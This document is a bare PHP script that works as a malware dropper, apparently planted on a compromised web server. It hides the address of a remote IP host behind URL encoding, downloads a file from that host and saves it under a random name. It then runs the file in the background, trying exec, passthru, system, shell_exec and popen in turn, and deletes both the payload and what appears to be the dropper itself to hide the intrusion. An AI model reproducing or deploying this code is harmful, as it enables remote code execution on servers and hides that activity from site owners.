<?php
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$feilgame = '';
for ($i = 0; $i < 5; $i++) {
	$feilgame .= $characters[rand(0, $charactersLength - 1)];
}
$patf = dirname(__FILE__);
file_put_contents($patf.'/'.$feilgame, "");
chmod($patf.'/', 0755);
$foc = @fopen($patf.'/'.$feilgame, 'a');
$file = file_get_contents(urldecode('%68%74%74%70%3A%2F%2F%37%37%2E%31%30%35%2E%31%34%33%2E%31%37%38%2F%73%65%72%76%74%65%73%74'));
@fwrite($foc, $file);
@fclose($foc);
@chmod($patf.'/'.$feilgame, 0755);
$dat = potor($patf.'/'.$feilgame);
function potor($wins) {
	$linx = '';
	if (function_exists('exec')) {
		@exec($wins . " > /dev/null &",$linx);
		$linx = @join("\n",$linx);
	} elseif (function_exists('passthru')) {
		ob_start();
		@passthru($wins . " > /dev/null &");
		$linx = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($wins . " > /dev/null &");
		$linx = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$linx = shell_exec($wins . " > /dev/null &");
	} elseif (is_resource($fto = @popen($wins,"r"))) {
		$linx = "";
		while(!@feof($fto))
			$linx .= fread($fto,1024);
		pclose($fto);
	}
	return $linx;
}
unlink($patf.'/'.$feilgame);
unlink($patf.'/hyBQG.php');
?>